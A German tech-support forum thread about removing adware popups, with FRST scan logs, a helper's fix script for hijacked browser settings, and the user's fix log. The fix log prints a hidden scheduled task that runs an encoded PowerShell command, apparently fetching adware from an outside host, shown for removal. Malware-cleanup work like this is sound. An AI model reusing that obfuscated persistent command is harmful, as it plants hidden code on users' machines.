FirewallRules: [{B53E91E7-7D7E-4DC4-84A2-4695B47B790D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{785F5761-7C62-47C4-93F0-C3AAE808C6D2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{4AD68999-7154-4205-9AAD-F265DF9DC595}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{F5D7ACD7-A77E-48C6-BB3E-ABE979E1A26D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{C5E2AE19-D8AC-4819-A5D8-4AD6BB435966}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{DC0218AF-50B6-4526-B46F-155DC21A92A9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Darksiders\DarksidersPC.exe
FirewallRules: [{0A93A914-348B-4551-8FDE-E60695AAF630}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Darksiders\DarksidersPC.exe
FirewallRules: [{3A2F1D8D-2623-4493-93FB-F5DE5C93FB55}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{5F6E9EC8-6D79-4B46-A0F1-B28C90E696D9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{0EA5B637-0DA7-4A97-8E85-5CD79888CE8A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{EF2C9179-69BC-4DC9-AF01-B304AACD6A5B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{AAF74500-FA72-436C-9D90-A7884E733935}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{C817C1A0-9BE0-418C-A79D-0924F3652977}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{494F18F7-0AF2-48C3-B32E-DC4E36F4A695}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{7ABFBE07-2B9C-45D4-84DA-8BDC90523525}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{1EC2EBE0-2617-471F-A26B-615C48A551AD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{9EE2DF30-FC77-413A-9B74-E32AE2ACE7B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{E6BF45A9-3D83-40E4-964B-4F86B5818621}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BrutalLegend\BrutalLegend.exe
FirewallRules: [{2B90CACD-2717-4D26-AB39-058D812FBB1A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BrutalLegend\BrutalLegend.exe
FirewallRules: [{1AB31C95-8BB4-443C-AC83-C13F30B0E182}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Outlast\OutlastLauncher.exe
FirewallRules: [{EB61ED4C-FA8E-498F-B149-1B115061AF29}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Outlast\OutlastLauncher.exe
FirewallRules: [TCP Query User{7EB0A191-C477-4A69-9ECA-5763427620C6}C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe
FirewallRules: [UDP Query User{C8EBF0D7-AB7B-4587-81BC-9AE980DA249C}C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe
FirewallRules: [{4E6937D5-04F5-4539-BEF7-B138490AAD23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DDDA\DDDA.exe
FirewallRules: [{E4B79FF8-C10A-4939-BFD2-C6DD7A08AD23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DDDA\DDDA.exe
FirewallRules: [{FC3688E3-900D-4493-9592-60E93E81E569}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{9541C4B0-A0F1-4CFD-AA7A-A85CA57A81CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{DB7F6160-1810-4D3A-AA8A-1DF318D24C39}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StreetFighterVBeta\StreetFighterVBeta.exe
FirewallRules: [{0211DCB6-C60B-47C2-83F8-DE0925A954C0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StreetFighterVBeta\StreetFighterVBeta.exe
FirewallRules: [{F66B2D58-C6D2-4558-AE2B-72B8CC30F0B2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{7ACD2605-EF0E-4237-B834-DACD8F211A1D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{2E7752D5-8196-4B4E-9BCF-A348740F032F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\sw.exe
FirewallRules: [{43895C6F-260A-4250-B2FF-012DAC6A5F0A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\sw.exe
FirewallRules: [{034CEEEE-CF58-4BDE-80F5-11C56DC3C834}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\HardReset\hardreset.exe
FirewallRules: [{5EB7E1F4-78F6-4CE8-A68F-1B82A146C265}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\HardReset\hardreset.exe
FirewallRules: [{B5F7B177-AD34-4474-8707-35BD69708048}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{A60E6840-712B-422F-B94D-238CE2C881D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{5B6BA538-2A65-4BDC-A1C4-C4F39B9BA112}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win32\UDK.exe
FirewallRules: [{8CA1F704-33D2-41C6-AFD6-713F677C9065}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win32\UDK.exe
FirewallRules: [{71F5EF11-9C08-4E68-9CEC-CCA87E2DA2E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win64\UDK.exe
FirewallRules: [{1CF74B5E-81F5-4603-9489-52839CE4732A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win64\UDK.exe
FirewallRules: [TCP Query User{4D2A3A39-929A-44C9-BE4B-51D5C9B62F8C}C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{C587A324-FD38-4A9D-90B9-8935F9B2BDC0}C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [{4304BD98-F809-449D-98F4-B2FA301BFB1E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{7A4CB929-6DAF-441E-A577-40F19270648D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{E23C7F1A-F8ED-43E4-8D99-CE3195C3E57E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\Soma.exe
FirewallRules: [{B152291A-5595-4DD4-9F6D-F095701B770C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\Soma.exe
FirewallRules: [{C8163371-598A-4DAD-BB48-8E4D57CD527C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\ModLauncher.exe
FirewallRules: [{E7347BD0-4112-4D83-9A3A-BA5469DDAC65}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\ModLauncher.exe
FirewallRules: [{9E90A79A-7621-4EA3-B70E-01DCC9CA0510}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rayman Legends\Rayman Legends.exe
FirewallRules: [{5CC90406-F64C-4F7A-884D-307FFF8F09E1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rayman Legends\Rayman Legends.exe
FirewallRules: [{C7CCE649-9F95-4854-BB13-F429142519DA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{EB9B2CD8-885F-4463-9E46-059856A620F2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{50D20954-63AB-469B-AADE-1803D0DD5515}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{7175597E-D585-4038-9B8A-6F621E57BD33}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TowerFall\TowerFall.exe
FirewallRules: [{A5E2973E-EB3A-4D87-A5C1-5FE270B9833F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TowerFall\TowerFall.exe
FirewallRules: [{29A96D38-8E61-42FC-9BBD-2049BFD8562C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{253879B1-73BC-455A-AFAE-6A0A4B462F47}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{0CD7AFDF-F517-4C92-8F8E-24FF3D0FB4B9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{BB4BD88E-AC21-4330-A63A-B523186D8360}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{94C00BF3-6892-40F5-BA09-EDE927FFFD56}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hell Yeah\HELLYEAH.exe
FirewallRules: [{9F57C3AA-5DEF-478F-9238-502399737614}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hell Yeah\HELLYEAH.exe
FirewallRules: [{11D8E4FE-95D0-42CA-BD4A-76A2366B9B8F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Jet Set Radio\jsrsetup.exe
FirewallRules: [{EB4563A3-8129-4CB2-9DAA-5A95523351B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Jet Set Radio\jsrsetup.exe
FirewallRules: [{5060C703-A91F-4345-8415-0C89464D844F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dont_starve\bin\dontstarve_steam.exe
FirewallRules: [{65BAA918-D2EA-4162-AC02-D81D0A62B05A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dont_starve\bin\dontstarve_steam.exe
FirewallRules: [{EF8DA61F-1B7D-4363-A56F-BE332C7DF84B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{BA34C35E-3197-4F29-B5C9-A46080321836}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe

==================== Wiederherstellungspunkte =========================

17-02-2016 07:27:29 DirectX wurde installiert
24-02-2016 20:34:02 Geplanter Prüfpunkt
27-02-2016 18:55:58 Wiederherstellungsvorgang

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/27/2016 07:43:32 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:14:34 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:11:07 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:55 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:19 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:05 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:09:39 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:09:23 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:07:33 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:07:26 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1644) SRUJet: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Windows\system32\SRU\SRU001D5.log.


Systemfehler:
=============
Error: (02/27/2016 10:06:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_35119" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 10:06:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 09:48:09 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Search" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (02/27/2016 09:48:03 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_3125a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 09:48:03 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 09:47:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Security Assist" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/27/2016 09:47:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 09:47:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/27/2016 09:47:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Rapid Storage Technology" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/27/2016 09:47:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Steam Client Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


CodeIntegrity:
===================================
  Date: 2016-02-12 03:20:44.853
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-11 12:10:33.797
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-10 11:26:47.553
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-04 08:02:11.501
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-29 03:36:41.152
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-27 07:13:22.396
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 22:14:41.012
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-14 14:19:56.240
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-06 20:51:52.294
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-30 09:20:05.336
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
Prozentuale Nutzung des RAM: 23%
Installierter physikalischer RAM: 8149.34 MB
Verfügbarer physikalischer RAM: 6233.38 MB
Summe virtueller Speicher: 9429.34 MB
Verfügbarer virtueller Speicher: 7402.72 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.92 GB) (Free:599.86 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 143626DE)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=500 MB) - (Type=27)

==================== Ende von Addition.txt ============================
         


Alt 28.02.2016, 03:21   #6
burningice
/// Malwareteam
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome



Schritt 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
ATTFilter
cmd: type C:\Windows\System32\Tasks\{79057847-0F05-080F-0B11-0D0D7F09117E}
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x00000000 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
emptytemp:
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.



Schritt 2
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

Hast du noch irgendwelche Probleme mit deinem Rechner?


Bitte poste in deiner nächsten Antwort also:
  • Fixlog.txt
  • Frst.txt
  • Addition.txt
__________________
--> Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome

Alt 28.02.2016, 07:47   #7
Blatt
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome



Auf den ersten Blick scheint das Problem beseitigt zu sein!! Ich warte lieber noch dein Urteil ab.

Hier sind die logs:

Fixlog
Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-02-2016
durchgeführt von Hanns (2016-02-28 07:35:07) Run:1
Gestartet von C:\Users\Hanns\Downloads
Geladene Profile: Hanns (Verfügbare Profile: Hanns)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
cmd: type C:\Windows\System32\Tasks\{79057847-0F05-080F-0B11-0D0D7F09117E}
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x00000000 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
emptytemp:
*****************


=========  type C:\Windows\System32\Tasks\{79057847-0F05-080F-0B11-0D0D7F09117E} =========

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="hxxp://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\{79057847-0F05-080F-0B11-0D0D7F09117E}</URI>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger id="t4">
      <Repetition>
        <Interval>PT8H</Interval>
        <Duration>PT24H</Duration>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2015-12-16T21:24:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>Hanns</UserId>
      <RunLevel>HighestAvailable</RunLevel>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT2H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe</Command>
      <Arguments>-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGgAYgBhAEIAZgByAE4AagBrADAALQBxAE8ATABLAHgAZQBjAGYATgB6AGgAXwBlAGMAdABsAGkAdQBUAHAAegA2ADAAbgBOAFIASABCAGUAagBkA